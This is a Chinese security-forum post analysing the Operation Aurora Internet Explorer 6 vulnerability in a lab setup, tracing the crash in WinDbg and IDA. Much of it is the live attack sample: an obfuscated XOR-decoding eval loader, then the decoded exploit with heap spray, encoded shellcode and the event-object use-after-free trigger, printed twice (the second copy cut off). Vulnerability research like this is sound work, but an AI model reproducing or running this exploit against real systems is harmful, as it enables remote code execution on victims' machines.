首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 看雪社区
  2. 二进制漏洞
    3. 发新帖
[原创]极光行动----漏洞分析
2019-6-1 16:04 12739

[原创]极光行动----漏洞分析

Kalendsi 活跃值
6
2019-6-1 16:04
12739

目录

极光行动----未知漏洞分析

极光行动简介

极光行动(英语:Operation Aurora)或欧若拉行动是2009年12月中旬可能源自中国的一场网络攻击,其名称“Aurora”(意为极光、欧若拉)来自攻击者电脑上恶意文件所在路径的一部分。遭受攻击的除了Google外,还有20多家公司:其中包括Adobe Systems、Juniper Networks、Rackspace、雅虎、赛门铁克、诺斯洛普·格鲁门和陶氏化工。这场攻击过后,Google提出了它的新计划:它将“在必要的法律范围内”,于中国运营一个完全不受过滤的搜索引擎;同时Google也承认,如果该计划不可实现,它将可能离开中国并关闭它在中国的办事处

 

以下是百度百科的详情介绍:

https://baike.baidu.com/item/极光行动/7064097?fr=aladdin

实验环境

靶机:windows xp sp3 ,Ie6.0(版本6.0.2900.5512)

 

放置网页的机器:windows 2003,iis6.0

工具

windbg , OllyDbg, notepad++

漏洞分析

提取出来的样本,并不是每次都能完美的执行

 

在windows 2003下搭建iis6.0的环境,此处不多赘述。

 

将以下代码,放入index.html里面

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
        var IwpVuiFqihVySoJStwXmT = '04271477133b000b1a0c240339133c120e2805160e1503684d705005291a08091b3e6e713e1122520b03123d051808392c0d27123b0a0805033c1c0735321a2407350314142935250829083c0a0000072f142624011f2a27022825082f253f2c39394a716a2615275207142524357d43772c2702705a2f466a657c6e4a256a7450614176566c65257e4165310515150a0f2b35302a103d0e03041e0234362f3a3c34073e1b0d0d02131e3f1635200e21101c38093913112e322223211f3239302133381b330a0c2c1175576c2e2713251f2308236b2f270f2d3e2d353c172b03393164031d192b1e363c012f072d311538230f2e113979490b03123d051808392c0d27123b0a0805033c1c0735321a2407350314142935250829083c0a0000072f142624011f2a27022825082f253f2c39393125176614310627466a656e0d3a3968730d261334463b1122303b07052d3d3705303e36340f05131d0b2934142b070d33657175043926244b261334461d362b31063d3e00263e1c110f11080f250e340020150110220c1e111c3d0e273f3a3a21050f2b2208341f04042c684d701c231177043e270b3562614b26133446220e083e1c0d0e1b3d1d31362b271221170036001a240230092e222638383d152b1a23162b0d3330230b14053e3e3c1a321537122d27043a30271d2439383b121f160a033e1c211e383f203e3e143136190210081f2c1e231603112d363975576c3f261523112716327e2a20042f3e211f3e5221212e233d131c0f1318223d2a24080212361718392626070a24072c27102533210823092a15390917190d3e3310250d0c04053d04173d1c0f212b180820333c382d3e3d2036000921320a1c36371e4e7e3e3a34186c271f1707352e1f260a1a2d281c3b3c1e113411272e3d2419043d080611023c280d1c3318332b3b1c3d061f0b050810103b173a160f32230a060d16260216001c1c05684d70070d223c330d113901070b001d02110b152f361f3818180a3f180725123a121534381f0c113b05152021162a3e211e26282f012408242e381f27020605220124293309293c3321011a033a040822143533003f08000e22392c35270835137f656b701f2a727c4175077f5565726920537b782e55254b7f52366039610b75286d05364b7255723078305e2e6f3d49624b76432223746108693f7b47694063136423756c4f392c7d49695733526f7c7d701f75287b167507725f632369205e29797f5525417152616039315c78786d05644a720372302a6d592a6f3d44364b774322767b6153693f7c4164136313637c2a314f3973704966573355602328701f782b7c1175077f506e7469205e7b7e7a55254623526460396c08787d6d0569107f5672302a6d597b6f3d1669462743227129665d693f2e13364763136e762a364f397e29433657335460717f701f75727c16750722506e726920537b2c7d55254b7752646039615b78726d0536477f5672302a365e746f3d4436147f4322777b315c693f7c116245631331217e624f392c7d4963573300337174701f75727116750772076e7569205e742c7d5525467f00336039615375796d05644a74517230756d53756f3d43364b2443227c7d6c59693f2c46644a631331217f334f397e7a4469573354602328701f752c714075072002647269205e7d797f55254b7f5f6460396c5d78796d05364775517230756d5e7d6f3d493240714322767b6c59693f7141644063136e7475634f397e7044675733006f2374701f2a2e7c48750772556e776920592a73795525462452646039615a787d6d056942200572307566592a6f3d496840714322777b610c693f7c4963456313637575674f397e794236573352357c7d701f2a727b16750772506e7c69205e7b7e7155254b705f6660396c5378736d056442725772307567592a6f3d42674b754322717f3352693f7c41694a6313317d756c4f397370496957335260712d701f78737c407507725e6e7769205e297e7e55254b77003460393352787b6d05644a7f507230756d5e296f3d426714224322712a6c58693f71466941631363762a6d4f39732e16655733006f7c7f701f2a2e2c4675072250637c69205e2d7e7e5525467f5f666039330e75726d0564452250723075375e7f6f3d16684b754322712e3353693f7c15644b6313632478634f397e7b446857330062717c701f787971487507750063276920537c7e7e55254624556060396158787b6d0563457f5f7230756c5e2a6f3d44314b714322232f6c5a693f7c1163146313637c75374f39797f496357335231767b701f782b711275077400637c69205e7c7e7b55254b2052656039610b2a726d056245725672302a3153756f3d166514224322767b615d693f7c4069406313647278624f39737b146657335f6f717a701f757c714975077500652369205e7b2c70552514255f6660396c5d75286d053647205e723028635e7b6f3d4463147f4322717f615d693f7c11634563133126786d4f397378423657335f352328701f78737c4275077451317c6920587b73795525467e5f316039615975726d0564417f5672307564537f6f3d49694171432223796c58693f7c49644063136e7378374f397379496357335f65772a701f75787c1275077551637d6920582a732a5525417154316039615b78286d056945725772302a360c756f3d4469147f4322217a335f693f714136116313637378664f397e7916345733006f7c7f701f7f7d7a47750772046e766920582a787f55254b765f3160396152787d6d05644b200272307562582a6f3d163446774322717b6c08693f7b4764406313637d2a6d4f397379446657335264217a701f75287a477507725731216920537f7e705525407152656039665d757c6d05364a205f72302a315e756f3d43364b7643227c7a6c5a693f71406944631331702a314f39782e496957335f6f2328701f2a2e2e147507725565236920537a2e7e55254b7552656039330978786d0564137f5e723078305e7e6f3d496246754322717b675d693f71436910631363722a314f397e79496357335236762a701f7f2c714175077f546e276920537d7e715525147f006f6039335f75286d05644a725f72307865532e6f3d49674b704322712e610c693f7147694563133170786d4f39737844615733526e7174701f757b7c4175077451637669205e7a2c7d552541715f6e6039335f78736d0569407f5472302a60537e6f3d44634b7443227c7c6153693f2e49644b6313637575674f397e784960573355312375701f782b2e1475077400637c69205e7e7e7b552546705f6060396c5c757d6d0569457251723078665e296f3d4962147e4322717b615b693f7b47364a63136e277e334f397e7e1466573355607c7d701f2a2e71477507725e6e2369200e7a737b552540205f616039665d757d6d056443200572302a6d537e6f3d16334b754322217a6c53693f7c4769406313637475374f39792e4432573352317c7c701f75282e147507725f642369200c282c7d55251473526660396159752c6d05364b205372307565532e6f3d44324b7f43227c7c6c59693f2e1469436313657278634f39737049365733526e717e701f757d2e487507725e6e7269205e7b792e55254b755560603933097f2c6d05364b200272307830582a6f3d4462147e43222375670c693f7146694263136e7575634f397e71146657335f317c2a701f757a714875077f56637569200c75737955254624546060396c0c757b6d056413725e7230786d0c746f3d4336467543227c75665d693f7c41344463136e7c78344f397e7a4432573352357c7a701f757b7c467507725e317d69200c74737b55254671543160396c527e2c6d05644b7f57723078675e7d6f3d493246744322717a6c08693f7c4263146313632378304f39737f496257335f657c7a701f2e2c714875072751672769205e2d2c2a5525167e0235603936537e736d056746225f72302a6158786f3d443210774322767d600b693f794267136313322474664f397a7b16335733076e727d701f2e2c79497507715767716920087e727155254a73006e603931082f2f6d0567137e0572307d36582a6f3d1663172343227728360b693f7e4763116313662675304f392f7b166057330734237e701f2d7b7f1275077451327369205c297a7155254a20566f603961522d7d6d0561427451723079605a7a6f3d14621724432277756553693f7846364463136675296c4f397f2a4369573353622074701f757e7a4475077603357d69205a7b787a55254127543460396c5e7b7c6d053511720272302d610c2f6f3d486941734322707d3659693f714068146313347c7d664f392e2a4864573350667d2e701f2a282b427507275036246920097b7b7955251175036260393759297b6d056047205172307f3759746f3d466911704322757e6c5c693f7e4735446313637629624f39737f1361573304317c7e701f7e7f7b4175077104367169200c7d7e2a55254b2354666039625829286d0567137f57723079635a286f3d406846714322747f655b693f7d466011631336777c634f392f2b136157335431767e701f7e782d4475077004357669200f7a297a5525407e5f316039370f7a286d056917725372302d6553786f3d473640744322242d665a693f714433436313317478674f397f714834573356367274701f2a7c7c157507715f672769205f757d2b552543730760603964582f296d053543705772307c6c597f6f3d473416734322277e360b693f7d476247631332737c6c4f39292e476557335e602774701f7c2c791575077354637169205f2a28785525422203366039665a7b7a6d0536177207723079345b746f3d42614673432273796652693f7c11681463136e2328674f39287d4568573305637d2d701f792e7d4275077652347d69205d2a7d7b5525177452626039630c7d736d053211765572307d6308796f3d436642234322217a675d693f7b426847631362267a624f39297a426957335f62777a701f287a7c447507735333236920522d7b7b5525447f51616039345b742f6d053614715072307a6559786f3d4967407643227079665c693f7b486044631335752f6c4f392c79413357335135702a701f2a2f7c12750771046f2369200b74722a5525452405626039650929796d0562142402723079665b7a6f3d4533447e4322267a6d08693f7b456940631363757b334f39282a163157330761247a701f787e2945750775506f216920537e732955251025036f60396c5a292b6d056716775e706c77230b3e6a3d1136050e2131121938122703291d704f66131c0127232b0819053d13020b1600280e3f1006181c22123d0e1334312102332d181b360939130131020d3a18383e22123703321c350d230f011b26011819263f27180a272307183a07001c0a340024101b2f2e192e26033437311c24306475486968685b70503344776e6c775a6e6a6350721164467c656e65486c6168523450664d77676920486c6168526050664d77672f774a676a6a4072526d4675216e7543772e27502b523307313204120c1b1f25083b3b270b776e71751f2d2c3f38171411333a3d271c0b216a3550271a2f0a326d6c200b2a3d00373625130b2f2e05340762262d1e37062e466b657c2d0e7c7a7840705b7d0038376c7d396c7768406b5215466b657d605a776a1b5b7b5b662c242228391b38021e1e3e252f201a063c311206222d2132162c2f031524310139380201273b0b131a3d063b222a111b2d704f661336233b1d2d2a1d1d1d28190f073a656775071b2d1f37380b3729013d0e051b3824093607333f1e3f09222428022b1a3e3e190d1003230d223c393c0709131c013320071c0f2f361912041b0237210d103a052577372e053e11320f382b6c02033f2d0d17043c0300360a023001093b293d293313271b09010c3d6429380a3e331c0e1021381a021809062306350a34331c29100c0f0b183b1d173c122714223a21180d03033a002e0e3c2a34163d1c30610b37353f0026033a16331c182528321c13312d073e2006223d1226113836333e230711030d100d3b1f03082e2523363c2d083e1d3f12032c3f14310d01282409243a3b2a2c032d102f38120e262e35085a6f5d3b1122303b07052d3d3705303e36340f05131d0b2934142b070d336571750e23293d1d351c3248343729341e290f3e153e0609043d202f21422f3a321e11282e213331033d3e0f041b26173e14020e200933290d1a033d35083216062b231e3e0b013b1a221a2e0d383d0f023a366373143f11330b322b387b0d293e0d1c351f23082307351c0e64683e18012b0025232a083b25361f07052833200a1316360327050211183a38290c160a0f1d24163e19143c0a1536111029101e24090f1402062f2f0e67657b0322242d0218260b2a77786c7748773d211e341d31482420381c04382f3a06311e6e08363c261b1f1f242b1e2835280e0d0106272f142b3c23141936097b6579654377372e053e11320f382b6c3b0b35200605031c25082f02223d3008003a3508133235132e3c3a42653138506d52643a22752f650c103f781360161a1367267c3136397a2b40342e3356347528091f7c2978140c077605672110205a2f7a2c2c2542255633193965097c2e1405601176020b307c365a28163d403342223a22752f650e103f781360161a1367267c3136397a2b40342e3356347528091f7c2978140c077605672110205a2f7a2c2c2542255633193965097c2e1405601176020b307c365a28163d403342223a22752f650e103f781360161a1367267c3136397a2b40342e3356347528091f7c2978140c077605672110205a2f7a2c2c2542255633193965097c2e1405601176020b307c365a28163d403342223a22752f650e103f781360161a1367267c3148772c2702705a2f466a657c6e4a256a74501d17031e1e082e200c091d0a391c1c1420270c212c121e1e1f371500050a2e352e302838301802113b05053f1139330706123d0a39312e0f222962390f222d3c186b522f4d7c6c37180f0932013d3207202300070519041e0c38393d0b3e3403120b10180f263100321704122d153e14230f29202425142b2c0f30363c2924233d1c0b1b1b48332438344a716a384b2d04271477316c684a201e2615013909031a223b23322d3b0b2029230707130115140128643b0233372a033a2022215131';
        var RXb = '';
        for (i = 0;i<IwpVuiFqihVySoJStwXmT.length;i+=2) {
            RXb += String.fromCharCode(parseInt(IwpVuiFqihVySoJStwXmT.substring(i, i+2), 16));
        }
        var vuWGWsvUonxrQzpqgBXPrZNSKRGee = location.search.substring(1);
        var NqxAXnnXiILOBMwVnKoqnbp = '';
        for (i=0;i<RXb.length;i++) {
            NqxAXnnXiILOBMwVnKoqnbp += String.fromCharCode(RXb.charCodeAt(i) ^ vuWGWsvUonxrQzpqgBXPrZNSKRGee.charCodeAt(i%vuWGWsvUonxrQzpqgBXPrZNSKRGee.length));
        }
        window["eval".replace(/[A-Z]/g,"")](NqxAXnnXiILOBMwVnKoqnbp);
</script>
</head>
<body>
<span id="vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY"><iframe src="/infowTVeeGDYJWNfsrdrvXiYApnuPoCMjRrSZuKtbVgwuZCXwxKjtEclbPuJPPctcflhsttMRrSyxl.gif" onload="WisgEgTNEfaONekEqaMyAUALLMYW(event)" /></span></body></html>
</body>
</html>

如下图:

 

1559366289001

 

在靶机中,在IE6.0中访问html文件(注:加参数[?rFfWELUjLJHpP])

 

如下:

 

1559366503968

 

因为该样本并不是每次都能完美进行堆喷射,所以在经过多次尝试后,终于找到了关键信息(IE崩溃)

 

如下图:

 

1559366665794

 

我们将windbg设置为即时调试器,然后重新访问该网页

 

再次等待程序崩溃,最终程序报出异常,windbg断在下面位置

 

1559367210114

 

程序断在此处,由上图可知,此时的ecx=00000006,该处内存并没有分配

 

那ecx来源与那里呢?我们来对ecx进行溯源

 

由该处汇编指令的上下文,我们可以得知 此处为一个函数,由某个函数调用产生异常

 

我们将 mshtml.dll拖入IDA 并跟随到 地址0x7e278c83

 

看到有交叉引用,直接查看。

 

*,真多

 

1559367491703

 

1559367516458

 

没办法,我只能进行栈回溯了,

 

在windbg中查看当前堆栈

 

1559367672635

 

u 7e44c4c0

 

由图,我们得知 ecx,又来源于ebx,继续回溯

 

1559367827157

 

这次我们可以继续用IDA分析了,在IDA中转到 0x7e44c4c0

 

我们发现,之前有多种情况跳转到该位置

 

1559368745846

 

我们以红色部分为情况来逐步进行回溯

 

ecx=ebx

 

ebx=[esi]

 

esi=[eax]

 

eax=[ebp+var8]=[ebp-8]

 

最终的值 来自于句柄变量

 

最总公式如下

 

ecx=[[[[ebp-8]]]]

 

然而在我们发生异常的位置,下面是这样几行代码

7e278c83 8b01            mov     eax,dword ptr [ecx]
7e278c85 ff5034          call    dword ptr [eax+34h]
7e278c88 8b400c          mov     eax,dword ptr [eax+0Ch]

最终 call dword ptr [eax+34h]

 

可以表达为 call dword ptr[[[[[[ebp-8]]]]]+34h]

 

也就是说 最后call的地址 可以由局部变量 ebp-8确定

 

那么我们就可以利用 堆喷射,进行漏洞利用(堆喷射技术与原理在此不多做阐述,有兴趣参考书籍 0day2)

 

我们先找到是那个函数的局部变量调用了该函数,在IDA中,往上翻找到函数头部

 

1559372159284

 

我们发现,该函数上次调用 来自于一个对象中的 2 个函数,

 

可是我们看我们的html里面,虽然有个img的图标,但是并没有调用函数,这是为什么呢?

 

在上述分析中,我们有提到,该网页要加参数

 

该脚本最重要地方是这行代码,将解密后的代码通过正则表达式进行转换,并作为代码执行

window["eval".replace(/[A-Z]/g,"")](NqxAXnnXiILOBMwVnKoqnbp);

然后我们真正要执行的代码,也就是处理之后的代码是下面的

<script>
    var VwUaVFlsiaztYmICdYI = "COMMENT";
    var MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul = new Array();
    for (i = 0; i < 1300; i++) {
        MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i] = document.createElement(VwUaVFlsiaztYmICdYI);
        MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = "XPu";
    }
    var lTneQKOeMgwvXaqCPyQAaDDYAkd = null;
    var JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf = new Array();
    var uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu = unescape;

    function gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX() {
        var mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu('%uf841%u9327%u972f%u994a%u4a9b%uf943%u4e4b%u9290%uf84b%u3792%u3f99%uf599%u4891%u9b3f%u494f%u4e37%u3746%ud642%u484e%uf83f%u4f91%u3749%u414a%u49fd%u9896%u37fd%u4a4a%u9691%u4742%u4e43%u9b47%u9b90%uf837%uf94a%u4e37%ufcf5%u93fc%u4a3f%u2743%u984f%ud697%u97f5%u9143%u4148%uf590%ufc48%u4ff9%u27d6%u4a27%ufd27%uf593%ufd48%u989f%u4a90%u48f5%u49fd%u4993%u4827%u9899%u3f9b%u9193%ud648%ufd3f%u4249%u27fd%u9f90%ufd37%u4137%u9993%u9743%uf537%u9841%u9b27%u3793%u9142%u9196%u4847%uf8f8%ufd48%u4392%u3f91%u4b43%u4047%u90fc%u933f%u9827%u274f%u4937%u4092%u412f%u4b91%uf83f%u4699%u4749%u9691%u9949%u4041%u923f%u2793%u43f8%u4198%uf899%u9899%u474a%u4940%u4892%u4e46%u91fc%uf841%u4896%u984e%u27fd%u4f92%u9693%u43f8%u9ff5%uf893%ufdd6%ud649%u4a46%u4991%ufd98%u47d6%u9b43%uf893%u4bf9%u4e49%u4a46%u4348%uf540%u4398%u3f4b%u9046%u4b37%u4241%u3799%u994f%u4a97%ufc90%u4a3f%u499b%u3793%u4f37%u4a9b%u2f49%u4043%u9f42%u4af8%u2740%ufd99%uf5fd%u3747%u4092%u3747%u93d6%u9846%u9699%u3f2f%u47f8%ufc91%u979b%uf5f8%ud647%u43f9%u4347%u4a37%ufc48%u902f%u9bfd%u4942%u27f9%u2791%u489f%u4398%u4390%u9193%u9937%uf592%u4942%u964b%u9193%u922f%u924b%u3748%u2f9b%u372f%u414b%u9741%ufcf9%u49f9%ud6f5%u91fc%u4643%u41fd%uf893%u3727%u4b93%u2f27%u909f%u4847%u49fd%u972f%ufd41%u479b%u3742%u48f8%u9146%u43d6%u9b27%u41fd%u9348%u2742%u3796%uf8f9%ufd49%u3f90%u9690%u9096%uf5fd%u2f99%u98fd%ufdfd%u432f%u96d6%u9342%ufc42%u4a98%u4e42%u9243%u4727%u939b%u47fd%u4193%u4a3f%u3f91%u929b%u9149%uf9f8%uf59b%u4849%u409b%u9796%u4b4f%u9797%uf548%u9041%u4948%u9141%u2743%u46f5%u3799%uf549%u9292%uf592%u4392%u9049%uf949%u4092%u4090%u3ff9%u4afd%u2f49%u4243%u4697%u9697%u9747%u434e%u92f8%u4741%u37f8%u9b2f%u46d6%u3791%ufd97%u489f%ud693%u2f96%u3797%u41fc%uf892%ufc93%ud699%u4792%u419b%u3f4b%u4f90%u9bfd%u493f%ufdf5%uf541%u439f%uf9f5%u909b%u4b99%u9093%ufd91%u2746%u989f%u4942%u97f8%u4897%u473f%u9337%ufc3f%uf9fd%u4e2f%u42f8%uf92f%u9690%u9096%u49d6%u9f9f%u9098%u9040%uf991%u4b27%u9f91%u4a48%u48f8%u3f43%u9937%u41d6%u994a%u424b%u4b96%u9146%u48f8%uf893%u472f%u982f%u4991%u4241%u9b42%u469b%u423f%u4f4e%u9792%u9296%ubf98%ua70b%u4afb%ud8db%uc929%u74d9%uf424%u4bb1%u315a%u127a%uea83%u03fc%ua971%ubf19%u7104%ub289%u85f9%udbce%u7a8c%u1c2f%uf3ee%u2dca%u673c%u1c9e%ue3f0%uacf2%ua17b%u27e6%u6e09%u8f08%u48a7%u1027%u5506%ud2eb%u2909%u06f6%u10e9%u5b39%u55e8%u9424%u0eb8%u0722%u3a2c%u9476%uec4d%ua4fc%u8935%u51c3%u908f%uc913%udb84%u618b%ufbc2%ua6aa%uc711%uc3e5%ub3e1%u05f7%u3b38%u69c6%u0296%u67e6%u43e7%u97c1%ubf92%u2531%u7ba4%uf14b%u9e21%u72eb%u7a91%u560d%u0847%u1301%u560c%ua206%uecc1%u2f32%u22e4%u6bb3%ue6c2%u289f%ube6b%u9e45%ua094%u7f22%uaa30%u94c1%uf142%u598d%u0a78%uf64e%u790b%u597c%u15a7%u12cc%ue161%u0933%u7dd5%ub2ca%u5725%ue609%ucf75%u87b8%u0f1e%u5244%u5fb0%u0dea%u3070%ufe4a%u5a18%u2145%u6538%u4a8f%u9fd2%ub558%uc48a%u5d52%u04c8%u7f73%ue245%u6f19%ubc03%u16b5%u360e%ud627%u3285%u5c67%uc229%u9526%ud044%u55df%u8a13%u6976%ua18e%uff76%u6034%u9720%u5536%u3806%ub0c9%uf11c%u7b5f%ufe4b%u7b8f%ua88b%u7bc5%u0ce3%u2fbd%u5316%u5c68%uc68b%u3592%u407f%ubbfa%ua6a6%u44a5%u368d%u929a%ubce8%u90ea%u7d18');
        var uafwHGfWUmxkIam = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu("%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d");
        do {
            uafwHGfWUmxkIam += uafwHGfWUmxkIam
        } while (uafwHGfWUmxkIam.length < 0xd0000);
        for (S = 0; S < 150; S++) 
        {
        JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf[S] = uafwHGfWUmxkIam + mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO;
        }
    }

    function WisgEgTNEfaONekEqaMyAUALLMYW(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz) {
        gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX();
        lTneQKOeMgwvXaqCPyQAaDDYAkd = document.createEventObject(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz);
        document.getElementById("vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY").innerHTML = "";
        window.setInterval(nayjNuSncnxGnhZDJrEXatSDkpo, 50);
    }

    function nayjNuSncnxGnhZDJrEXatSDkpo() {
        p = "\u0c0f\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
        for (i = 0; i < MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul.length; i++) {
            MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = p;
        }

        //此处 此处触发漏洞 (必须还要有body里面的内容)
        var t = lTneQKOeMgwvXaqCPyQAaDDYAkd.srcElement;
    }
</script>

我们将这段代码替换原来index.html里面 script 标签的内容

 

替换整体代码如下:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
    var VwUaVFlsiaztYmICdYI = "COMMENT";
    var MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul = new Array();
    for (i = 0; i < 1300; i++) {
        MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i] = document.createElement(VwUaVFlsiaztYmICdYI);
        MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = "XPu";
    }
    var lTneQKOeMgwvXaqCPyQAaDDYAkd = null;
    var JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf = new Array();
    var uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu = unescape;

    function gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX() {
        var mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu('%uf841%u9327%u972f%u994a%u4a9b%uf943%u4e4b%u9290%uf84b%u3792%u3f99%uf599%u4891%u9b3f%u494f%u4e37%u3746%ud642%u484e%uf83f%u4f91%u3749%u414a%u49fd%u9896%u37fd%u4a4a%u9691%u4742%u4e43%u9b47%u9b90%uf837%uf94a%u4e37%ufcf5%u93fc%u4a3f%u2743%u984f%ud697%u97f5%u9143%u4148%uf590%ufc48%u4ff9%u27d6%u4a27%ufd27%uf593%ufd48%u989f%u4a90%u48f5%u49fd%u4993%u4827%u9899%u3f9b%u9193%ud648%ufd3f%u4249%u27fd%u9f90%ufd37%u4137%u9993%u9743%uf537%u9841%u9b27%u3793%u9142%u9196%u4847%uf8f8%ufd48%u4392%u3f91%u4b43%u4047%u90fc%u933f%u9827%u274f%u4937%u4092%u412f%u4b91%uf83f%u4699%u4749%u9691%u9949%u4041%u923f%u2793%u43f8%u4198%uf899%u9899%u474a%u4940%u4892%u4e46%u91fc%uf841%u4896%u984e%u27fd%u4f92%u9693%u43f8%u9ff5%uf893%ufdd6%ud649%u4a46%u4991%ufd98%u47d6%u9b43%uf893%u4bf9%u4e49%u4a46%u4348%uf540%u4398%u3f4b%u9046%u4b37%u4241%u3799%u994f%u4a97%ufc90%u4a3f%u499b%u3793%u4f37%u4a9b%u2f49%u4043%u9f42%u4af8%u2740%ufd99%uf5fd%u3747%u4092%u3747%u93d6%u9846%u9699%u3f2f%u47f8%ufc91%u979b%uf5f8%ud647%u43f9%u4347%u4a37%ufc48%u902f%u9bfd%u4942%u27f9%u2791%u489f%u4398%u4390%u9193%u9937%uf592%u4942%u964b%u9193%u922f%u924b%u3748%u2f9b%u372f%u414b%u9741%ufcf9%u49f9%ud6f5%u91fc%u4643%u41fd%uf893%u3727%u4b93%u2f27%u909f%u4847%u49fd%u972f%ufd41%u479b%u3742%u48f8%u9146%u43d6%u9b27%u41fd%u9348%u2742%u3796%uf8f9%ufd49%u3f90%u9690%u9096%uf5fd%u2f99%u98fd%ufdfd%u432f%u96d6%u9342%ufc42%u4a98%u4e42%u9243%u4727%u939b%u47fd%u4193%u4a3f%u3f91%u929b%u9149%uf9f8%uf59b%u4849%u409b%u9796%u4b4f%u9797%uf548%u9041%u4948%u9141%u2743%u46f5%u3799%uf549%u9292%uf592%u4392%u9049%uf949%u4092%u4090%u3ff9%u4afd%u2f49%u4243%u4697%u9697%u9747%u434e%u92f8%u4741%u37f8%u9b2f%u46d6%u3791%ufd97%u489f%ud693%u2f96%u3797%u41fc%uf892%ufc93%ud699%u4792%u419b%u3f4b%u4f90%u9bfd%u493f%ufdf5%uf541%u439f%uf9f5%u909b%u4b99%u9093%ufd91%u2746%u989f%u4942%u97f8%u4897%u473f%u9337%ufc3f%uf9fd%u4e2f%u42f8%uf92f%u9690%u9096%u49d6%u9f9f%u9098%u9040%uf991%u4b27%u9f91%u4a48%u48f8%u3f43%u9937%u41d6%u994a%u424b%u4b96%u9146%u48f8%uf893%u472f%u982f%u4991%u4241%u9b42%u469b%u423f%u4f4e%u9792%u9296%ubf98%ua70b%u4afb%ud8db%uc929%u74d9%uf424%u4bb1%u315a%u127a%uea83%u03fc%ua971%ubf19%u7104%ub289%u85f9%udbce%u7a8c%u1c2f%uf3ee%u2dca%u673c%u1c9e%ue3f0%uacf2%ua17b%u27e6%u6e09%u8f08%u48a7%u1027%u5506%ud2eb%u2909%u06f6%u10e9%u5b39%u55e8%u9424%u0eb8%u0722%u3a2c%u9476%uec4d%ua4fc%u8935%u51c3%u908f%uc913%udb84%u618b%ufbc2%ua6aa%uc711%uc3e5%ub3e1%u05f7%u3b38%u69c6%u0296%u67e6%u43e7%u97c1%ubf92%u2531%u7ba4%uf14b%u9e21%u72eb%u7a91%u560d%u0847%u1301%u560c%ua206%uecc1%u2f32%u22e4%u6bb3%ue6c2%u289f%ube6b%u9e45%ua094%u7f22%uaa30%u94c1%uf142%u598d%u0a78%uf64e%u790b%u597c%u15a7%u12cc%ue161%u0933%u7dd5%ub2ca%u5725%ue609%ucf75%u87b8%u0f1e%u5244%u5fb0%u0dea%u3070%ufe4a%u5a18%u2145%u6538%u4a8f%u9fd2%ub558%uc48a%u5d52%u04c8%u7f73%ue245%u6f19%ubc03%u16b5%u360e%ud627%u3285%u5c67%uc229%u9526%ud044%u55df%u8a13%u6976%ua18e%uff76%u6034%u9720%u5536%u3806%ub0c9%uf11c%u7b5f%ufe4b%u7b8f%ua88b%u7bc5%u0ce3%u2fbd%u5316%u5c68%uc68b%u3592%u407f%ubbfa%ua6a6%u44a5%u368d%u929a%ubce8%u90ea%u7d18');
